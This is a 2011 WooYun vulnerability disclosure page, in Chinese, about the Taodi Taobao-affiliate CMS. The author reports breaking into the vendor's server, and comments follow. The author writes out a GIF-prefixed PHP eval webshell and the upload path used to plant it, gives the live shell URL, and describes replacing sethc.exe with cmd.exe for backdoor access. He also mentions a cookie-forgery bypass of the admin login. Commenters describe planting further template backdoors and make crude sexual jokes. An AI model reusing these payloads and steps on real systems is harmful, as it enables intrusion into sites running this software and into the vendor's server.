当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02339

漏洞标题:淘帝淘宝客安全意识差,编写源码漏洞太多,直接拿下服务器(vps)

相关厂商:淘帝淘宝客taodisoft.com

漏洞作者: isee

提交时间:2011-06-29 09:58

修复时间:2011-06-29 10:33

公开时间:2011-06-29 10:33

漏洞类型:地下0day/成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-06-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-06-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1、演示站后台竟然有一个地方可上传图片,没有禁止上传。
2、上传图片简单过滤,很容易突破,上传php文件,并能执行。
3、服务器(vps)配置严重低级,拿到webshell之后直接是系统权限,windows系统,替换sethc.exe,直接远程桌面连接即可。
4、其所销售的源代码同样存在此上传漏洞。
5、其所销售的源代码还存在伪造cookie直接进入后台漏洞。所以其所销售的源代码网站后台路径不改,可直接修改cookie进入后台,插入一句话木马或者直接上传可执行文件,拿到webshell。

详细说明:


1、上传地址是:后台-首页配置-分类产品-下面图片上传
2、直接构造shell.php文件代码是

GIF89A
<?php @eval($_POST['pass']);?>


3、上传即可得到shell,地址是:http://pro.taodisoft.com/img/index/shell.php
4、拿到webshell之后就是系统权限了。。。。。。。

漏洞证明:


把sethc.exe替换成cmd.exe了

修复方案:

洞太多了,所有购买源码的客户都受到威胁。

版权声明:转载请注明来源 isee@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评论

  1. 2011-06-29 11:07 | arctan0 ( 路人 | Rank:15 漏洞数:3 | @nsfocus)

    兄弟真牛,自己曝光自己的入侵事件,不怕被跨省啊?

  2. 2011-06-29 11:20 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    一般不涉及经济的测试都没有问题的额

  3. 2011-06-29 12:14 | 风云 ( 路人 | 还没有发布任何漏洞 | 简要介绍)

    已帮他修补好了,程序员太马虎了

  4. 2011-06-29 12:44 | saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)

    人家是路人甲,

  5. 2011-06-30 11:27 | etcat ( 普通白帽子 | Rank:149 漏洞数:22 | 0101010101001010101010101010100101010101...)

    哈哈 太强大了 佩服你了

  6. 2012-02-08 19:01 | 紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)

    早发现的漏洞了~而且还可以修改模版文件我是修改的模版文件 直接if($_GET['**']){ /*phpspy*/}

  7. 2012-03-18 20:08 | Frankie ( 路人 | Rank:10 漏洞数:1 | 你存在,我的代码里...Line 0://你)

    @xsser 今天看到你这句话,想起了,曾经看到某报道说...不射J的插入不算强奸...淡淡的笑过...

  8. 2012-07-21 21:28 | Cp0204 ( 实习白帽子 | Rank:37 漏洞数:4 | 著名艺术家)

    @Frankie 你暴强,还有带了套的不算~~ 这源码不用数据库,用php存配置,一句话强力插入。。把用淘帝的站淘客id都改了,就暴强了